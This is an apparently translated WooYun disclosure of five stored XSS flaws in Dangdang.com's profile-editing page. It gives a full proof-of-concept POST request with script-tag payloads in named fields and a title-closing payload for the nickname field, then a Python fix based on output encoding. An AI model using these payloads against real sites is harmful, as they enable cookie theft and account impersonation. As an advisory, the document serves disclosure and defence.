
Vulnerability ID: wooyun-2010-0254

Title: Multiple stored XSS vulnerabilities on Dangdang.com (当当网)

Vendor: Dangdang.com (当当网)

Author: 路人甲

Submitted: 2010-08-22 01:47

Fix deadline: 2010-08-22 11:49

Published: 2010-08-22 11:49

Vulnerability type: XSS (cross-site scripting)

Severity: Medium

Self-assessed Rank: 10

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2010-08-22: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2010-08-22: Vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

Dangdang.com has multiple stored XSS vulnerabilities.

Details:

The "edit personal profile" page on Dangdang.com contains five XSS vulnerabilities. The first four are in the blog address, interests, "people you like or admire" and self-introduction fields: writing the XSS string <script>alert(/1/)</script> into any of them gets it executed. The fifth is in the nickname field. Because that field has a length limit, a POST form can be constructed locally to submit </title><script>alert(/1/)</script>, which runs JavaScript that can be used to steal users' cookies and impersonate their logins.

Proof of concept:

Host=customer.dangdang.com
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 (BT-beachlife) Firefox/3.6.8
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=zh-cn,zh;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Referer=http://customer.dangdang.com/profile/Myarchives.php?save=ok
Content-Type=multipart/form-data; boundary=---------------------------97891525516423
Content-Length=2559
POSTDATA =-----------------------------97891525516423
Content-Disposition: form-data; name="hd_value"
3
-----------------------------97891525516423
Content-Disposition: form-data; name="Myfile"; filename=""
Content-Type: application/octet-stream
-----------------------------97891525516423
Content-Disposition: form-data; name="hid_opt"
-----------------------------97891525516423
Content-Disposition: form-data; name="v_date"
27019229
-----------------------------97891525516423
Content-Disposition: form-data; name="Txt_petname"
p3h4ck
-----------------------------97891525516423
Content-Disposition: form-data; name="area_clientID"
ctl04
-----------------------------97891525516423
Content-Disposition: form-data; name="ctl04$s1"
1
-----------------------------97891525516423
Content-Disposition: form-data; name="ctl04$s2"
116
-----------------------------97891525516423
Content-Disposition: form-data; name="hd_area"
188
-----------------------------97891525516423
Content-Disposition: form-data; name="hd_area_parent"
116
-----------------------------97891525516423
Content-Disposition: form-data; name="gp_sex"
Rd_sex_1
-----------------------------97891525516423
Content-Disposition: form-data; name="Rd_sexis"
0
-----------------------------97891525516423
Content-Disposition: form-data; name="gp_standing"
student
-----------------------------97891525516423
Content-Disposition: form-data; name="defaultValue"
本科生
-----------------------------97891525516423
Content-Disposition: form-data; name="Rd_standingis"
0
-----------------------------97891525516423
Content-Disposition: form-data; name="Dp_year"
0
-----------------------------97891525516423
Content-Disposition: form-data; name="Dp_month"
0
-----------------------------97891525516423
Content-Disposition: form-data; name="Dp_day"
0
-----------------------------97891525516423
Content-Disposition: form-data; name="Txt_blog"
<script>alert(/1/)</script>
-----------------------------97891525516423
Content-Disposition: form-data; name="Txt_interesting"
<script>alert(/2/)</script>
-----------------------------97891525516423
Content-Disposition: form-data; name="Txt_love"
<script>alert(/3/)</script>
-----------------------------97891525516423
Content-Disposition: form-data; name="Txt_introduce"
<script>alert(/4/)</script>
-----------------------------97891525516423
Content-Disposition: form-data; name="Button1"
保存基本信息
-----------------------------97891525516423--

Fix recommendation:

Filter cross-site scripting keywords.
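The durable fix for the five fields above is contextual output encoding at render time plus server-side re-validation of the nickname length, rather than keyword filtering on input. The following is an added example, not Dangdang's code; it reuses the form field names from the POST above, and the nickname limit is an assumed value.

```python
import html
from typing import Dict, Optional
from urllib.parse import urlparse

# Field names come from the multipart POST in the report; the nickname limit is an
# assumed value standing in for whatever the form's client-side check enforces.
PROFILE_FIELDS = ("Txt_petname", "Txt_blog", "Txt_interesting", "Txt_love", "Txt_introduce")
MAX_NICKNAME_LEN = 16  # assumed


def validate_profile(form: Dict[str, str]) -> Dict[str, str]:
    """Server-side validation: a hand-built POST skips any browser-enforced maxlength."""
    nick = form.get("Txt_petname", "")
    if len(nick) > MAX_NICKNAME_LEN:
        raise ValueError("nickname exceeds %d characters" % MAX_NICKNAME_LEN)
    # Store values verbatim; encoding is applied per output context at render time,
    # which is more robust than stripping "dangerous" keywords on the way in.
    return {name: form.get(name, "") for name in PROFILE_FIELDS}


def safe_blog_href(raw: str) -> Optional[str]:
    """Only http(s) URLs may become a clickable link; anything else is shown as text."""
    parts = urlparse(raw.strip())
    if parts.scheme in ("http", "https") and parts.netloc:
        return html.escape(raw.strip(), quote=True)
    return None


def render_profile(profile: Dict[str, str]) -> str:
    """Build the profile page, HTML-encoding each stored value for the context it lands in."""
    esc = {k: html.escape(v, quote=True) for k, v in profile.items()}
    href = safe_blog_href(profile["Txt_blog"])
    blog = '<a href="%s">%s</a>' % (href, esc["Txt_blog"]) if href else esc["Txt_blog"]
    return (
        "<html><head><title>%s</title></head><body>\n"
        "<p>Blog: %s</p>\n<p>Interests: %s</p>\n<p>Admires: %s</p>\n<p>About: %s</p>\n"
        "</body></html>"
    ) % (esc["Txt_petname"], blog, esc["Txt_interesting"], esc["Txt_love"], esc["Txt_introduce"])


def contains_live_markup(page: str, stored: Dict[str, str]) -> bool:
    """Regression check: no submitted value containing '<' may survive into the page raw."""
    return any(v in page for v in stored.values() if "<" in v)
```

Escaping inside <title> matters as much as in the body: the nickname payload relies on closing the title element early, and an encoded `&lt;/title&gt;` cannot do that.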

Copyright notice: please credit the source when reposting: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively declined the report

Vulnerability Rank: 7 (WooYun rating)